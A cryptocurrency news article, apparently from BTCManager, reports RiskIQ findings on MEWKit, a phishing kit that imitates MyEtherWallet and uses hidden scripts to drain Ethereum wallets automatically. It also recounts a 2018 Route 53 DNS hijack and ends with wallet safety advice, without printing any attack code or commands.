MEWKit: New Malware Drains Ethereum Wallets Automatically
According to security research firm, RiskIQ, a criminal group has devised a phishing attack that uses Automated Transfer System (ATS) to empty MyEtherWallet (MEW) Ethereum wallets without detection.
MEWKit Phishing Attack
MEWKit is the name of the new phishing campaign that imitates the front end of the MyEtherWallet (an open source project), with the aim of stealing funds that belong to victim’s wallet.
According to the security researchers, the actors have also automated the transfer system whereby details captured by the fake webpage are used to transfer funds automatically.  The actors reportedly drain the accounts once their victims decrypt their wallet. The fact that the actors can steal victim’s wallet keys means they will always be in a position to steal additional funds, should the attack go unnoticed.
It has emerged the scam uses scripts which automatically create the fund transfer, by pressing a button like legitimate users all while the activity remains hidden. MEWkit back end, on the other hand, allows the hackers to keep track of all the ethers that are stolen while keeping track of private user keys.
Display: None (hidden) function to maliciously send ether. Source: RiskIQ Report
MyEtherWallet appears to be the most affected wallet, with the new phishing attacks, given that it is simple to use and the fact that it lacks advanced security features to detect suspicious scripts injected in active web sessions. Unlike banks which offer additional layers of security, the wallet gives users direct access to the Ethereum network, a vulnerability that MEWKit leverages to steal logins credentials.
Phishing Prevention Tips. Source: MyEtherWallet
Â
The most recent attack involving the MEWKit malware took place on April 24, 2018, whereby the cybercriminals rerouted traffic intended for Amazon’s Route 53 DNS. Cybercriminals executed a man in the middle attack and in the process walked away with $152,000 in ether from the digital wallet.
Criminals have managed to pay Google Adwords for advertising their phishing page for keyword ‘myetherwallet.’
Â
The first two links (ads) are phishing sites.
The Russian Connection
No remedy has so far been provided for the phishing attack that threatens to get out of hand given the vulnerability of MyEtherWallet. However, RiskIQ advises all people with the digital wallet accounts to be extra careful when using the platform, especially when dealing with suspicious URLs.
Perpetrators of the sophisticated attack appear to have been in operation for quite some time. However, it is still unclear the number of people who might have fallen prey or the number of tokens stolen so far. While the identity of the attackers is still unknown, it is emerging that they could be based in Russia given the location of some of the IP address, uncovered by the security research firm.
The hacking of MyEtherWallet underscores the need to select a digital wallet that has added layers of security if one is to be on the safe side when it comes to handling digital currencies.
The attack also shows that actors are slowly shifting their attention from cryptocurrency exchanges that for quite some time have come under attacks. Early in 2018, Japanese cryptocurrency exchange, Coincheck, was the subject of a significant security breach that saw $500 million worth of NEM tokens stolen.
BTCManager advises it’s readers to use hardware wallets like Ledger and Trezor whenever possible as they are more secure than online wallets.